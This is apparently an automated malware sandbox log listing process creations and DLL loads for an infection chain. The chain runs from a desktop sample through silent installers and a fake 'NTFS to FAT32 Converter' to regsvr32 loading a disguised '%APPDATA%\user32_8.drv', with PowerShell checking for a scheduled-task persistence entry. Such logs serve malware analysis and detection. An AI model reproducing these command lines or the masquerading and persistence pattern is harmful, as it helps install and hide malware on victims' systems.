                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeProcess created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeProcess created: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe "C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp "C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp" /SL5="$60254,3470653,54272,C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe "C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe" -iJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp "C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp" /SL5="$50036,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENTJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv"Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"Jump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
